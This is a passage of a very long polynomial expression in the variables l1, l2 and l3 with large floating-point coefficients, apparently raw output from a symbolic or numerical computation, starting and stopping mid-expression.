5.77029770907359e+32*l1**9*l2*l3**18 - 3.99889627032392e+32*l1**9*l2*l3**17 - 2.91177371132018e+31*l1**9*l2*l3**16 + 2.16951190630005e+31*l1**9*l2*l3**15 + 5.04275487563916e+29*l1**9*l2*l3**14 - 3.97365811351966e+29*l1**9*l2*l3**13 - 1.37927241225307e+27*l1**9*l2*l3**12 + 4.35345377195304e+27*l1**9*l2*l3**11 - 4.13693569801408e+25*l1**9*l2*l3**10 - 3.55420377227319e+25*l1**9*l2*l3**9 + 5.02814708790841e+23*l1**9*l2*l3**8 + 2.01881698388734e+23*l1**9*l2*l3**7 - 2.24846846013686e+21*l1**9*l2*l3**6 - 6.67233090717018e+20*l1**9*l2*l3**5 + 4.23347178601544e+18*l1**9*l2*l3**4 + 9.83487583539651e+17*l1**9*l2*l3**3 - 2.79351789182419e+15*l1**9*l2*l3**2 - 409664252584361.0*l1**9*l2*l3 + 264533088872.745*l1**9*l2 + 9.98363672143404e+31*l1**9*l3**19 + 1.04894817188327e+32*l1**9*l3**18 + 5.77846313378882e+30*l1**9*l3**17 - 5.07222281618018e+30*l1**9*l3**16 - 2.76945290089732e+29*l1**9*l3**15 + 8.11287811604455e+28*l1**9*l3**14 + 6.36028021221888e+27*l1**9*l3**13 - 1.34092596413341e+26*l1**9*l3**12 - 6.81195011115686e+25*l1**9*l3**11 - 4.9515393851678e+24*l1**9*l3**10 + 4.18990723576747e+23*l1**9*l3**9 + 5.45384603507266e+22*l1**9*l3**8 - 1.41548958002152e+21*l1**9*l3**7 - 2.26022476920939e+20*l1**9*l3**6 + 2.3869861466071e+18*l1**9*l3**5 + 3.95442202090761e+17*l1**9*l3**4 - 1.66566922118468e+15*l1**9*l3**3 - 243499992502604.0*l1**9*l3**2 + 264533088872.748*l1**9*l3 + 18313829229.6525*l1**9 + 2.11333266750713e+32*l1**8*l2**20 - 1.29520750925568e+33*l1**8*l2**19*l3 + 2.19634455237111e+32*l1**8*l2**19 - 1.03001368844606e+33*l1**8*l2**18*l3**2 - 1.47942170940601e+33*l1**8*l2**18*l3 - 2.56594232447065e+31*l1**8*l2**18 - 1.01280052168492e+32*l1**8*l2**17*l3**3 + 2.60772813269236e+33*l1**8*l2**17*l3**2 + 2.31464695442102e+31*l1**8*l2**17*l3 - 2.02524249482489e+31*l1**8*l2**17 - 1.00140651581602e+34*l1**8*l2**16*l3**4 - 5.44123748694587e+33*l1**8*l2**16*l3**3 + 1.67667767265274e+31*l1**8*l2**16*l3**2 + 6.11909665572335e+31*l1**8*l2**16*l3 + 6.61156339239423e+29*l1**8*l2**16 + 6.50824282602517e+32*l1**8*l2**15*l3**5 + 3.58393956974114e+33*l1**8*l2**15*l3**4 - 1.20080423864395e+32*l1**8*l2**15*l3**3 - 1.25204771939542e+32*l1**8*l2**15*l3**2 + 2.32258681959223e+29*l1**8*l2**15*l3 + 5.09304454377476e+29*l1**8*l2**15 - 1.26042025449496e+34*l1**8*l2**14*l3**6 - 4.85294697339611e+33*l1**8*l2**14*l3**5 + 2.8665824584816e+32*l1**8*l2**14*l3**4 + 1.7853158259219e+32*l1**8*l2**14*l3**3 - 3.01106662856182e+28*l1**8*l2**14*l3**2 - 9.3644422558117e+29*l1**8*l2**14*l3 - 7.18738507804962e+27*l1**8*l2**14 - 1.30189843375475e+34*l1**8*l2**13*l3**7 - 2.38487037316335e+33*l1**8*l2**13*l3**6 - 2.55461602203792e+32*l1**8*l2**13*l3**5 - 1.71648786811135e+32*l1**8*l2**13*l3**4 + 3.62380602228621e+30*l1**8*l2**13*l3**3 + 2.13766947135953e+30*l1**8*l2**13*l3**2 - 1.15564653106946e+28*l1**8*l2**13*l3 - 6.01025032150012e+27*l1**8*l2**13 - 5.9876833473629e+33*l1**8*l2**12*l3**8 - 1.79056395808807e+19*l1**8*l2**12*l3**7 + 3.36429303093262e+32*l1**8*l2**12*l3**6 + 1.52335033452495e+32*l1**8*l2**12*l3**5 - 2.65340093381237e+30*l1**8*l2**12*l3**4 - 1.94957329324001e+30*l1**8*l2**12*l3**3 - 4.97236016601412e+27*l1**8*l2**12*l3**2 + 5.14447348089231e+27*l1**8*l2**12*l3 + 5.43336456134796e+25*l1**8*l2**12 - 1.94283902705572e+34*l1**8*l2**11*l3**9 - 7.46944549218493e+33*l1**8*l2**11*l3**8 - 4.60238708938332e+31*l1**8*l2**11*l3**7 - 5.40234912795836e+31*l1**8*l2**11*l3**6 + 5.53852719281074e+30*l1**8*l2**11*l3**5 + 2.45518453087999e+30*l1**8*l2**11*l3**4 - 4.86403767691958e+28*l1**8*l2**11*l3**3 - 1.80176029519051e+28*l1**8*l2**11*l3**2 + 1.41099021980177e+26*l1**8*l2**11*l3 + 4.65326689978182e+25*l1**8*l2**11 - 1.23947571739081e+34*l1**8*l2**10*l3**10 + 1.50071050984537e+33*l1**8*l2**10*l3**9 + 1.7554457794649e+32*l1**8*l2**10*l3**8 + 4.30464285972372e+31*l1**8*l2**10*l3**7 - 1.50787680489109e+30*l1**8*l2**10*l3**6 - 1.01021496697876e+30*l1**8*l2**10*l3**5 - 8.54064033373533e+27*l1**8*l2**10*l3**4 + 3.90630687391363e+27*l1**8*l2**10*l3**3 + 1.23450158416715e+26*l1**8*l2**10*l3**2 - 2.4044125904763e+21*l1**8*l2**10*l3 - 2.72157543367229e+23*l1**8*l2**10 - 6.24032821434022e+33*l1**8*l2**9*l3**11 - 7.12837492176553e+33*l1**8*l2**9*l3**10 + 9.17292807942645e+31*l1**8*l2**9*l3**9 + 3.55506727624605e+31*l1**8*l2**9*l3**8 + 3.17535796889477e+30*l1**8*l2**9*l3**7 + 1.19365647862595e+30*l1**8*l2**9*l3**6 - 6.25350118476677e+28*l1**8*l2**9*l3**5 - 1.9153360108362e+28*l1**8*l2**9*l3**4 + 4.07790948431369e+26*l1**8*l2**9*l3**3 + 1.13618497346053e+26*l1**8*l2**9*l3**2 - 8.91439698635152e+23*l1**8*l2**9*l3 - 2.24736062875927e+23*l1**8*l2**9 - 1.9630506164139e+34*l1**8*l2**8*l3**12 + 8.1856936900656e+32*l1**8*l2**8*l3**11 + 1.16207978311105e+32*l1**8*l2**8*l3**10 + 8.08815658836474e+30*l1**8*l2**8*l3**9 + 9.77089659974251e+29*l1**8*l2**8*l3**8 + 1.01746227073522e+29*l1**8*l2**8*l3**7 - 3.37668263469903e+28*l1**8*l2**8*l3**6 - 6.37052896587105e+27*l1**8*l2**8*l3**5 + 3.10951068219509e+26*l1**8*l2**8*l3**4 + 5.72014668017754e+25*l1**8*l2**8*l3**3 - 1.11366695326489e+24*l1**8*l2**8*l3**2 - 1.69237484985048e+23*l1**8*l2**8*l3 + 1.02517290212832e+21*l1**8*l2**8 + 9.38672851923458e+32*l1**8*l2**7*l3**13 - 4.19516801615866e+33*l1**8*l2**7*l3**12 + 1.07991550104918e+32*l1**8*l2**7*l3**11 + 2.18374619961329e+31*l1**8*l2**7*l3**10 + 7.18037359968163e+29*l1**8*l2**7*l3**9 + 5.55646095311101e+29*l1**8*l2**7*l3**8 - 4.78273698823278e+28*l1**8*l2**7*l3**7 - 1.4137784074885e+28*l1**8*l2**7*l3**6 + 5.06933011844077e+26*l1**8*l2**7*l3**5 + 1.31954713972132e+26*l1**8*l2**7*l3**4 - 2.18082119324214e+24*l1**8*l2**7*l3**3 - 5.19766478031497e+23*l1**8*l2**7*l3**2 + 3.35959522683324e+21*l1**8*l2**7*l3 + 7.16808762421722e+20*l1**8*l2**7 - 1.06252436308677e+34*l1**8*l2**6*l3**14 - 7.870859317371e+32*l1**8*l2**6*l3**13 - 2.20094575732149e+31*l1**8*l2**6*l3**12 + 3.70459030169021e+31*l1**8*l2**6*l3**11 + 2.5870500152729e+30*l1**8*l2**6*l3**10 + 3.74288859159088e+28*l1**8*l2**6*l3**9 - 4.67928274107467e+28*l1**8*l2**6*l3**8 - 9.38157521978152e+27*l1**8*l2**6*l3**7 + 4.5636813315053e+26*l1**8*l2**6*l3**6 + 1.0630006544513e+26*l1**8*l2**6*l3**5 - 2.2922445925636e+24*l1**8*l2**6*l3**4 - 5.11444875580028e+23*l1**8*l2**6*l3**3 + 4.89622499871884e+21*l1**8*l2**6*l3**2 + 8.85348056093136e+20*l1**8*l2**6*l3 - 2.38242186080792e+18*l1**8*l2**6 - 2.41656203422434e+33*l1**8*l2**5*l3**15 - 2.08015567673362e+32*l1**8*l2**5*l3**14 + 1.75972005024593e+32*l1**8*l2**5*l3**13 - 3.9641741756382e+31*l1**8*l2**5*l3**12 - 1.49737444968715e+30*l1**8*l2**5*l3**11 + 7.81321035955884e+29*l1**8*l2**5*l3**10 - 2.04700020574099e+28*l1**8*l2**5*l3**9 - 1.12072467681887e+28*l1**8*l2**5*l3**8 + 3.87477973166535e+26*l1**8*l2**5*l3**7 + 1.14087455465824e+26*l1**8*l2**5*l3**6 - 2.52253139636031e+24*l1**8*l2**5*l3**5 - 6.30820906412335e+23*l1**8*l2**5*l3**4 + 7.15798071971924e+21*l1**8*l2**5*l3**3 + 1.59779850397627e+21*l1**8*l2**5*l3**2 - 7.00766431282022e+18*l1**8*l2**5*l3 - 1.28795054342675e+18*l1**8*l2**5 - 1.31714041528997e+33*l1**8*l2**4*l3**16 - 2.10489266315976e+33*l1**8*l2**4*l3**15 - 1.23663440037677e+32*l1**8*l2**4*l3**14 + 6.84612216508113e+31*l1**8*l2**4*l3**13 + 3.24437646604653e+30*l1**8*l2**4*l3**12 - 5.40985395126669e+29*l1**8*l2**4*l3**11 - 4.4093343260844e+28*l1**8*l2**4*l3**10 - 3.56852253574686e+27*l1**8*l2**4*l3**9 + 4.02882721340639e+26*l1**8*l2**4*l3**8 + 7.93124308559087e+25*l1**8*l2**4*l3**7 - 2.35674733466588e+24*l1**8*l2**4*l3**6 - 5.48947882979692e+23*l1**8*l2**4*l3**5 + 7.49392586955509e+21*l1**8*l2**4*l3**4 + 1.68210211087916e+21*l1**8*l2**4*l3**3 - 9.75599716360444e+18*l1**8*l2**4*l3**2 - 1.71780770726495e+18*l1**8*l2**4*l3 + 2.47571752053413e+15*l1**8*l2**4 - 1.91232730081307e+33*l1**8*l2**3*l3**17 + 1.21166257148555e+33*l1**8*l2**3*l3**16 + 1.13037262568738e+32*l1**8*l2**3*l3**15 - 5.68703618259477e+31*l1**8*l2**3*l3**14 - 1.7393509384434e+30*l1**8*l2**3*l3**13 + 8.8584908867704e+29*l1**8*l2**3*l3**12 + 2.82072734452556e+27*l1**8*l2**3*l3**11 - 8.6874768591676e+27*l1**8*l2**3*l3**10 + 1.40887444533942e+26*l1**8*l2**3*l3**9 + 7.38843035167269e+25*l1**8*l2**3*l3**8 - 1.50673798942812e+24*l1**8*l2**3*l3**7 - 4.54320059335684e+23*l1**8*l2**3*l3**6 + 6.35633179386999e+21*l1**8*l2**3*l3**5 + 1.57477591289202e+21*l1**8*l2**3*l3**4 - 1.12173718536365e+19*l1**8*l2**3*l3**3 - 2.29743668272874e+18*l1**8*l2**3*l3**2 + 5.97366828067834e+15*l1**8*l2**3*l3 + 785139805289571.0*l1**8*l2**3 - 1.23490589924744e+32*l1**8*l2**2*l3**18 - 1.03535532277644e+33*l1**8*l2**2*l3**17 - 4.8017762217122e+31*l1**8*l2**2*l3**16 + 3.90583416325165e+31*l1**8*l2**2*l3**15 + 1.50837511940342e+30*l1**8*l2**2*l3**14 - 5.00222115851928e+29*l1**8*l2**2*l3**13 - 2.4131250989245e+28*l1**8*l2**2*l3**12 + 1.14268087626026e+27*l1**8*l2**2*l3**11 + 2.2783809238866e+26*l1**8*l2**2*l3**10 + 2.27967501670931e+25*l1**8*l2**2*l3**9 - 1.38854766514102e+24*l1**8*l2**2*l3**8 - 2.56466164025233e+23*l1**8*l2**2*l3**7 + 5.11998126926438e+21*l1**8*l2**2*l3**6 + 1.10441951472698e+21*l1**8*l2**2*l3**5 - 9.69725467131939e+18*l1**8*l2**2*l3**4 - 1.95838191124376e+18*l1**8*l2**2*l3**3 + 7.05536213595101e+15*l1**8*l2**2*l3**2 + 975342219544877.0*l1**8*l2**2*l3 - 824122315334.324*l1**8*l2**2 - 1.49810077165903e+32*l1**8*l2*l3**19 + 3.1498429382469e+32*l1**8*l2*l3**18 + 1.43641084670418e+31*l1**8*l2*l3**17 - 1.70857971770023e+31*l1**8*l2*l3**16 - 3.58388751827962e+29*l1**8*l2*l3**15 + 3.26909752419397e+29*l1**8*l2*l3**14 + 2.89531072391811e+27*l1**8*l2*l3**13 - 3.45553714167482e+27*l1**8*l2*l3**12 + 9.04587159008013e+24*l1**8*l2*l3**11 + 2.74284839170401e+25*l1**8*l2*l3**10 - 3.14989575560256e+23*l1**8*l2*l3**9 - 1.63000369681018e+23*l1**8*l2*l3**8 + 2.03061698879871e+21*l1**8*l2*l3**7 + 6.32709797833202e+20*l1**8*l2*l3**6 - 5.38622215608982e+18*l1**8*l2*l3**5 - 1.23365610734234e+18*l1**8*l2*l3**4 + 5.60619428947135e+15*l1**8*l2*l3**3 + 868146917084753.0*l1**8*l2*l3**2 - 1281968046075.63*l1**8*l2*l3 - 82412231533.4322*l1**8*l2 - 5.95242411867481e+31*l1**8*l3**20 - 6.626513939577e+31*l1**8*l3**19 - 2.32044450955961e+30*l1**8*l3**18 + 3.69034132486023e+30*l1**8*l3**17 + 1.48818000918516e+29*l1**8*l3**16 - 7.04712521908938e+28*l1**8*l3**15 - 4.1247766713072e+27*l1**8*l3**14 + 3.58643885338069e+26*l1**8*l3**13 + 5.12012259561935e+25*l1**8*l3**12 + 1.55776095904274e+24*l1**8*l3**11 - 3.69877565772345e+23*l1**8*l3**10 - 3.64273081639469e+22*l1**8*l3**9 + 1.50544299850238e+21*l1**8*l3**8 + 2.00213213493607e+20*l1**8*l3**7 - 3.1995141297789e+18*l1**8*l3**6 - 4.65064742294903e+17*l1**8*l3**5 + 3.08140329498583e+15*l1**8*l3**4 + 441117671812893.0*l1**8*l3**3 - 824122315334.338*l1**8*l3**2 - 82412231533.4353*l1**8*l3 + 23005895.8995315*l1**8 - 1.59360608401089e+32*l1**7*l2**21 + 8.04021466776227e+32*l1**7*l2**20*l3 - 1.27782776346142e+32*l1**7*l2**20 - 1.97451680653059e+32*l1**7*l2**19*l3**2 + 7.98579885025947e+32*l1**7*l2**19*l3 + 1.61390758325858e+31*l1**7*l2**19 + 2.88736990831241e+32*l1**7*l2**18*l3**3 - 1.66882207012243e+33*l1**7*l2**18*l3**2 - 2.68878088618379e+31*l1**7*l2**18*l3 + 1.1171886899946e+31*l1**7*l2**18 + 4.00156153485467e+33*l1**7*l2**17*l3**4 + 3.05899073355496e+33*l1**7*l2**17*l3**3 + 1.91558528695768e+31*l1**7*l2**17*l3**2 - 3.90745646130371e+31*l1**7*l2**17*l3 - 4.41883985285162e+29*l1**7*l2**17 - 4.07119157072059e+32*l1**7*l2**16*l3**5 - 2.11823564371683e+33*l1**7*l2**16*l3**4 + 4.08941690947279e+31*l1**7*l2**16*l3**3 + 8.73699329818813e+31*l1**7*l2**16*l3**2 + 2.26871604914948e+29*l1**7*l2**16*l3 - 2.99385814652613e+29*l1**7*l2**16 + 1.37794176239774e+33*l1**7*l2**15*l3**6 + 1.04405074830803e+33*l1**7*l2**15*l3**5 - 1.43571802091103e+32*l1**7*l2**15*l3**4 - 1.32093584064589e+32*l1**7*l2**15*l3**3 - 3.58216235749805e+29*l1**7*l2**15*l3**2 + 7.15737399422001e+29*l1**7*l2**15*l3 + 5.29339926071983e+27*l1**7*l2**15 + 1.51287077926692e+34*l1**7*l2**14*l3**7 + 3.86046909375807e+33*l1**7*l2**14*l3**6 + 1.56445912993358e+32*l1**7*l2**14*l3**5 + 1.38287775057829e+32*l1**7*l2**14*l3**4 - 1.73363169635672e+30*l1**7*l2**14*l3**3 - 1.62225359334033e+30*l1**7*l2**14*l3**2 + 3.53766814166718e+27*l1**7*l2**14*l3 + 3.81593646421015e+27*l1**7*l2**14 - 1.76190643385887e+34*l1**7*l2**13*l3**8 - 4.99537204675803e+33*l1**7*l2**13*l3**7 - 1.49500228784006e+32*l1**7*l2**13*l3**6 - 1.12567711264105e+32*l1**7*l2**13*l3**5 + 1.93687363483628e+30*l1**7*l2**13*l3**4 + 1.87006484529611e+30*l1**7*l2**13*l3**3 + 3.6584911613047e+27*l1**7*l2**13*l3**2 - 5.34110792694106e+27*l1**7*l2**13*l3 - 4.43712563336486e+25*l1**7*l2**13 + 3.67850926319002e+34*l1**7*l2**12*l3**9 + 8.11747957598181e+33*l1**7*l2**12*l3**8 - 6.80060836008256e+31*l1**7*l2**12*l3**7 + 4.07833298022348e+31*l1**7*l2**12*l3**6 - 3.69518217078431e+30*l1**7*l2**12*l3**5 - 2.17856416073232e+30*l1**7*l2**12*l3**4 + 2.88268489693789e+28*l1**7*l2**12*l3**3 + 1.41393076015477e+28*l1**7*l2**12*l3**2 - 7.35882848440467e+25*l1**7*l2**12*l3 - 3.23618178410463e+25*l1**7*l2**12 - 3.13885982732643e+34*l1**7*l2**11*l3**10 - 4.18379899714468e+33*l1**7*l2**11*l3**9 + 1.41222040653388e+32*l1**7*l2**11*l3**8 - 8.17314677002112e+30*l1**7*l2**11*l3**7 + 1.4503933470983e+30*l1**7*l2**11*l3**6 + 1.30025873634959e+30*l1**7*l2**11*l3**5 - 3.38360870492925e+27*l1**7*l2**11*l3**4 - 8.51028920111052e+27*l1**7*l2**11*l3**3 - 6.92648384897303e+25*l1**7*l2**11*l3**2 + 1.60804621100092e+25*l1**7*l2**11*l3 + 2.48188062001065e+23*l1**7*l2**11 + 4.24645492415507e+34*l1**7*l2**10*l3**11 + 3.40161048898286e+33*l1**7*l2**10*l3**10 - 3.52206083260989e+32*l1**7*l2**10*l3**9 - 3.1808351788458e+31*l1**7*l2**10*l3**8 - 1.54338214366234e+30*l1**7*l2**10*l3**7 - 1.03685439400257e+30*l1**7*l2**10*l3**6 + 4.18965390917898e+28*l1**7*l2**10*l3**5 + 1.55906815552267e+28*l1**7*l2**10*l3**4 - 2.71746956770428e+26*l1**7*l2**10*l3**3 - 8.84329239546889e+25*l1**7*l2**10*l3**2 + 6.05282802536507e+23*l1**7*l2**10*l3 + 1.73713670641559e+23*l1**7*l2**10 - 3.0064739170303e+34*l1**7*l2**9*l3**12 + 2.09189949857234e+33*l1**7*l2**9*l3**11 + 2.81317335350385e+32*l1**7*l2**9*l3**10 + 3.74201508721059e+30*l1**7*l2**9*l3**9 - 1.14859551419563e+30*l1**7*l2**9*l3**8 + 1.17041730145451e+29*l1**7*l2**9*l3**7 + 1.29569096027138e+28*l1**7*l2**9*l3**6 - 5.35986937074197e+26*l1**7*l2**9*l3**5 - 1.49891582281965e+26*l1**7*l2**9*l3**4 - 8.2062464071786e+24*l1**7*l2**9*l3**3 + 7.41850770497481e+23*l1**7*l2**9*l3**2 + 6.07517965918223e+22*l1**7*l2**9*l3 - 1.07059475078085e+21*l1**7*l2**9 + 3.18099321745003e+34*l1**7*l2**8*l3**13 - 2.1146375366003e+33*l1**7*l2**8*l3**12 - 3.20646251845774e+32*l1**7*l2**8*l3**11 - 9.83833884918142e+30*l1**7*l2**8*l3**10 + 1.07169021265069e+29*l1**7*l2**8*l3**9 - 2.33418173487153e+29*l1**7*l2**8*l3**8 + 3.07870311233308e+28*l1**7*l2**8*l3**7 + 9.2980190267727e+27*l1**7*l2**8*l3**6 - 3.55635366626876e+26*l1**7*l2**8*l3**5 - 9.5938879187399e+25*l1**7*l2**8*l3**4 + 1.64104146449614e+24*l1**7*l2**8*l3**3 + 4.03566855276993e+23*l1**7*l2**8*l3**2 - 2.83566614358911e+21*l1**7*l2**8*l3 - 6.40445352538534e+20*l1**7*l2**8 - 1.68644613183201e+34*l1**7*l2**7*l3**14 + 3.88295726323628e+33*l1**7*l2**7*l3**13 + 1.36921670596146e+32*l1**7*l2**7*l3**12 - 8.72663501596475e+30*l1**7*l2**7*l3**11 - 8.51114984585965e+29*l1**7*l2**7*l3**10 - 2.86424819399064e+29*l1**7*l2**7*l3**9 + 2.16496388048181e+28*l1**7*l2**7*l3**8 + 5.53116005498545e+27*l1**7*l2**7*l3**7 - 2.65758344351349e+26*l1**7*l2**7*l3**6 - 5.76253356555726e+25*l1**7*l2**7*l3**5 + 1.59600222528979e+24*l1**7*l2**7*l3**4 + 3.09865660678677e+23*l1**7*l2**7*l3**3 - 4.13207392986152e+21*l1**7*l2**7*l3**2 - 6.10907279065498e+20*l1**7*l2**7*l3 + 3.0081885534629e+18*l1**7*l2**7 + 1.28738939996548e+34*l1**7*l2**6*l3**15 - 1.49171524205408e+33*l1**7*l2**6*l3**14 - 7.02375059607094e+31*l1**7*l2**6*l3**13 - 1.96067315852886e+31*l1**7*l2**6*l3**12 - 1.23650607252461e+30*l1**7*l2**6*l3**11 + 1.70554264846618e+29*l1**7*l2**6*l3**10 + 2.81193202366713e+28*l1**7*l2**6*l3**9 + 4.54181017166924e+27*l1**7*l2**6*l3**8 - 3.26761295752754e+26*l1**7*l2**6*l3**7 - 7.45038623286723e+25*l1**7*l2**6*l3**6 + 2.0740213593259e+24*l1**7*l2**6*l3**5 + 4.80624844972373e+23*l1**7*l2**6*l3**4 - 6.53335359944734e+21*l1**7*l2**6*l3**3 - 1.4032167476433e+21*l1**7*l2**6*l3**2 + 7.59131541753029e+18*l1**7*l2**6*l3 + 1.43838906079608e+18*l1**7*l2**6 - 3.32458434404416e+33*l1**7*l2**5*l3**16 + 7.07627732914089e+32*l1**7*l2**5*l3**15 - 5.45278437758449e+31*l1**7*l2**5*l3**14 + 3.34441787355991e+31*l1**7*l2**5*l3**13 + 1.24913429177461e+30*l1**7*l2**5*l3**12 - 6.61263079702434e+29*l1**7*l2**5*l3**11 + 4.12715862359137e+27*l1**7*l2**5*l3**10 + 6.93412367949938e+27*l1**7*l2**5*l3**9 - 1.9784467632275e+26*l1**7*l2**5*l3**8 - 6.65252099649368e+25*l1**7*l2**5*l3**7 + 1.76998009836884e+24*l1**7*l2**5*l3**6 + 4.32563636292888e+23*l1**7*l2**5*l3**5 - 6.93986856579545e+21*l1**7*l2**5*l3**4 - 1.45436251531678e+21*l1**7*l2**5*l3**3 + 1.08342776074818e+19*l1**7*l2**5*l3**2 + 1.67326998263752e+18*l1**7*l2**5*l3 - 3.81328129996066e+15*l1**7*l2**5 + 1.92365467506874e+33*l1**7*l2**4*l3**17 + 8.31312665044224e+32*l1**7*l2**4*l3**16 + 6.14342058855512e+31*l1**7*l2**4*l3**15 - 5.10650476346062e+31*l1**7*l2**4*l3**14 - 2.15072782809898e+30*l1**7*l2**4*l3**13 + 6.36183213293794e+29*l1**7*l2**4*l3**12 + 2.98208479601012e+28*l1**7*l2**4*l3**11 - 6.12243811152203e+26*l1**7*l2**4*l3**10 - 2.76155505921872e+26*l1**7*l2**4*l3**9 - 3.77341746278232e+25*l1**7*l2**4*l3**8 + 1.78292623004884e+24*l1**7*l2**4*l3**7 + 3.7146081372885e+23*l1**7*l2**4*l3**6 - 7.11208092897582e+21*l1**7*l2**4*l3**5 - 1.54625107761235e+21*l1**7*l2**4*l3**4 + 1.39323205848444e+19*l1**7*l2**4*l3**3 + 2.68805587246597e+18*l1**7*l2**4*l3**2 - 8.7613693731442e+15*l1**7*l2**4*l3 - 1.20330535630117e+15*l1**7*l2**4 + 1.38815860976562e+32*l1**7*l2**3*l3**18 - 7.65797131297726e+32*l1**7*l2**3*l3**17 - 5.356543039059e+31*l1**7*l2**3*l3**16 + 4.39482056764004e+31*l1**7*l2**3*l3**15 + 1.25560535297793e+30*l1**7*l2**3*l3**14 - 7.40886581737807e+29*l1**7*l2**3*l3**13 - 8.18699027103315e+27*l1**7*l2**3*l3**12 + 6.54079910163178e+27*l1**7*l2**3*l3**11 - 3.48505480452579e+25*l1**7*l2**3*l3**10 - 4.89041921802802e+25*l1**7*l2**3*l3**9 + 8.71074543423945e+23*l1**7*l2**3*l3**8 + 3.06959602824297e+23*l1**7*l2**3*l3**7 - 5.15887799310649e+21*l1**7*l2**3*l3**6 - 1.28264059853735e+21*l1**7*l2**3*l3**5 + 1.27397953290765e+19*l1**7*l2**3*l3**4 + 2.54242332398868e+18*l1**7*l2**3*l3**3 - 1.12649244334645e+16*l1**7*l2**3*l3**2 - 1.46789701711189e+15*l1**7*l2**3*l3 + 1663506155026.69*l1**7*l2**3 + 2.36320121726492e+32*l1**7*l2**2*l3**19 + 5.87790776450263e+32*l1**7*l2**2*l3**18 + 2.11593329238151e+31*l1**7*l2**2*l3**17 - 2.77694593805833e+31*l1**7*l2**2*l3**16 - 8.57986636752684e+29*l1**7*l2**2*l3**15 + 4.44602619430632e+29*l1**7*l2**2*l3**14 + 1.5510081939903e+28*l1**7*l2**2*l3**13 - 2.39698702624812e+27*l1**7*l2**2*l3**12 - 1.58357034379161e+26*l1**7*l2**2*l3**11 - 3.56614247959044e+24*l1**7*l2**2*l3**10 + 1.04861479007006e+24*l1**7*l2**2*l3**9 + 1.41356312966122e+23*l1**7*l2**2*l3**8 - 4.43211569516187e+21*l1**7*l2**2*l3**7 - 8.31239053700628e+20*l1**7*l2**2*l3**6 + 1.05516587159931e+19*l1**7*l2**2*l3**5 + 2.00994632949601e+18*l1**7*l2**2*l3**4 - 1.13260931568753e+16*l1**7*l2**2*l3**3 - 1.69952335251168e+15*l1**7*l2**2*l3**2 + 2975997249818.49*l1**7*l2**2*l3 + 206030578833.584*l1**7*l2**2 - 2.85405410167801e+31*l1**7*l2*l3**20 - 1.94497679131476e+32*l1**7*l2*l3**19 - 4.54717024971515e+30*l1**7*l2*l3**18 + 1.13073703633639e+31*l1**7*l2*l3**17 + 1.89095948335388e+29*l1**7*l2*l3**16 - 2.33632217214429e+29*l1**7*l2*l3**15 - 2.68197420047067e+27*l1**7*l2*l3**14 + 2.49525162968422e+27*l1**7*l2*l3**13 + 9.6402586911634e+24*l1**7*l2*l3**12 - 1.92995987615582e+25*l1**7*l2*l3**11 + 1.17919838102038e+23*l1**7*l2*l3**10 + 1.13476703501766e+23*l1**7*l2*l3**9 - 1.32725476444448e+21*l1**7*l2*l3**8 - 4.85600039323479e+20*l1**7*l2*l3**7 + 4.96426690273244e+18*l1**7*l2*l3**6 + 1.16987123994934e+18*l1**7*l2*l3**5 - 7.51941346253548e+15*l1**7*l2*l3**4 - 1.18204287721823e+15*l1**7*l2*l3**3 + 2975997249818.43*l1**7*l2*l3**2 + 247236694600.291*l1**7*l2*l3 - 92023583.5981301*l1**7*l2 + 3.55368604099989e+31*l1**7*l3**21 + 3.62309397148818e+31*l1**7*l3**20 + 4.20445616344498e+29*l1**7*l3**19 - 2.26833894234698e+30*l1**7*l3**18 - 6.16111190906583e+28*l1**7*l3**17 + 4.98376396713487e+28*l1**7*l3**16 + 2.20838067258923e+27*l1**7*l3**15 - 3.83171622313484e+26*l1**7*l3**14 - 3.19578037745327e+25*l1**7*l3**13 + 5.69792590768025e+23*l1**7*l3**12 + 2.69066229934842e+23*l1**7*l3**11 + 1.77941761809808e+22*l1**7*l3**10 - 1.2940419200847e+21*l1**7*l3**9 - 1.39513208578172e+20*l1**7*l3**8 + 3.3522711460887e+18*l1**7*l3**7 + 4.25107783068314e+17*l1**7*l3**6 - 4.2086620785652e+15*l1**7*l3**5 - 586724624321225.0*l1**7*l3**4 + 1663506155026.72*l1**7*l3**3 + 206030578833.581*l1**7*l3**2 - 2.11660861968994e-5*l1**7*l3 + 13803537.5397157*l1**7 + 8.78073418795359e+31*l1**6*l2**22 - 4.17780215195051e+32*l1**6*l2**21*l3 + 5.97685571020671e+31*l1**6*l2**21 + 3.7041624342985e+32*l1**6*l2**20*l3**2 - 3.60660264720417e+32*l1**6*l2**20*l3 - 8.38014863402453e+30*l1**6*l2**20 - 2.05225368867745e+32*l1**6*l2**19*l3**3 + 8.11573049613353e+32*l1**6*l2**19*l3**2 + 1.99198218971115e+31*l1**6*l2**19*l3 - 5.20644299329176e+30*l1**6*l2**19 - 1.60721003838659e+33*l1**6*l2**18*l3**4 - 1.24604448393223e+33*l1**6*l2**18*l3**3 - 2.60669484297213e+31*l1**6*l2**18*l3**2 + 2.07192085729215e+31*l1**6*l2**18*l3 + 2.45252530298191e+29*l1**6*l2**18 + 5.22391848026993e+32*l1**6*l2**17*l3**5 + 2.53966393973839e+32*l1**6*l2**17*l3**4 + 1.23380941450793e+30*l1**6*l2**17*l3**3 - 4.97119010106633e+31*l1**6*l2**17*l3**2 - 3.26060117321362e+29*l1**6*l2**17*l3 + 1.49294629657491e+29*l1**6*l2**17 + 1.33046673794371e+33*l1**6*l2**16*l3**6 + 2.1020441616925e+33*l1**6*l2**16*l3**5 + 5.29208397992938e+31*l1**6*l2**16*l3**4 + 7.78375954360358e+31*l1**6*l2**16*l3**3 + 5.03100374665731e+29*l1**6*l2**16*l3**2 - 4.42308001609059e+29*l1**6*l2**16*l3 - 3.20996238239032e+27*l1**6*l2**16 - 1.09175898340843e+34*l1**6*l2**15*l3**7 - 6.82351030420603e+33*l1**6*l2**15*l3**6 - 7.52616439383452e+31*l1**6*l2**15*l3**5 - 8.01866096311122e+31*l1**6*l2**15*l3**4 + 4.49042807188918e+29*l1**6*l2**15*l3**3 + 1.03338311489547e+30*l1**6*l2**15*l3**2 + 6.35076457415195e+26*l1**6*l2**15*l3 - 2.05057902536866e+27*l1**6*l2**15 + 1.62006438711302e+34*l1**6*l2**14*l3**8 + 1.07613387009691e+34*l1**6*l2**14*l3**7 + 5.78082600340301e+31*l1**6*l2**14*l3**6 + 4.69569438123759e+31*l1**6*l2**14*l3**5 - 9.52817041695187e+29*l1**6*l2**14*l3**4 - 1.38165719001661e+30*l1**6*l2**14*l3**3 - 3.65447815625277e+27*l1**6*l2**14*l3**2 + 4.04713013105889e+27*l1**6*l2**14*l3 + 